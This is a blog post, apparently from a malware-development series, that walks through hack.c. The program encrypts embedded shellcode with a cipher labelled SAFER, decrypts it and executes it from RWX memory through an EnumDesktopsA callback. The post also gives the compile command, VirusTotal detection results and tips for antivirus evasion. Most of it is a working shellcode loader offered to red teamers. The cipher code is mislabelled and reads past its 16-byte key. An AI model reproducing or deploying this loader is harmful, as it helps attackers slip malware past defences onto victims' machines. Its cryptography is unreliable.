Full source code for my main logic ("malicious" payload encryption) looks like this (hack.c):

/*
 * hack.c - encrypt and decrypt shellcode via SAFER. C++ implementation
 * @cocomelonc
 * https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define BLOCK_SIZE 8 // 64 bits
#define ROUNDS 6

void safer_encrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = 0; i < ROUNDS; i++) {
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

void safer_decrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = ROUNDS - 1; i >= 0; i--) {
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

int main() {
  unsigned char key[] = "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77";
  unsigned char my_payload[] =
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int len = sizeof(my_payload);
  int pad_len = (len + BLOCK_SIZE - 1) & ~(BLOCK_SIZE - 1);

  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);
  memcpy(padded, my_payload, len);

  // encrypt the padded shellcode
  for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
    safer_encrypt(&padded[i], key);
  }

  printf("encrypted:\n");
  for (int i = 0; i < sizeof(padded); i++) {
    printf("\\x%02x", padded[i]);
  }
  printf("\n\n");

  // decrypt the padded shellcode
  for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
    safer_decrypt(&padded[i], key);
  }

  printf("decrypted:\n");
  for (int i = 0; i < sizeof(padded); i++) {
    printf("\\x%02x", padded[i]);
  }
  printf("\n\n");

  LPVOID mem = VirtualAlloc(NULL, sizeof(padded), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, pad_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);

  return 0;
}

As you can see, first of all, before encrypting, we pad the payload with NOP (\x90) instructions.
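For example, with BLOCK_SIZE set to 8, a 13-byte payload is rounded up by (13 + 7) & ~7 to a pad_len of 16, and the three extra bytes are filled with \x90 so the tail of the decrypted buffer still executes as harmless NOPs.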

As usual, I used the meow-meow payload:

"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";

For simplicity, I run the shellcode via the EnumDesktopsA logic.

demo

Let's see this trick in action. Compile our "malware":

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


And run it on the victim's machine (Windows 10 x64 v1903 in my case):


As you can see, our decrypted shellcode is modified only by the trailing padding: the \x90 padding works as expected.

Calculate the entropy and upload to VirusTotal:

python3 entropy.py -f ./hack.exe


https://www.virustotal.com/gui/file/65c5a47a5c965647f5724e520b23e947deb74ef48b7b961f8f159cdd9c392deb/detection

24 of 70 AV engines detect our file as malicious, as expected.

As you can see, this algorithm encrypts the payload quite well, but it is still detected by many AV engines and is poorly suited for bypassing them. This is most likely because a well-studied method of launching the payload is used. If you apply anti-debugging, anti-disassembly and anti-VM tricks, the result will be better.

The Singapore government has considered using SAFER with a 128-bit key for various applications due to its lack of patent, copyright, or other restrictions, making it an attractive choice for widespread adoption.

I hope this post spreads awareness to the blue teamers of this interesting encryption technique, and adds a weapon to the red teamers' arsenal.

SAFER
Malware and cryptography 1
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and goodbye!
PS. All drawings and screenshots are mine
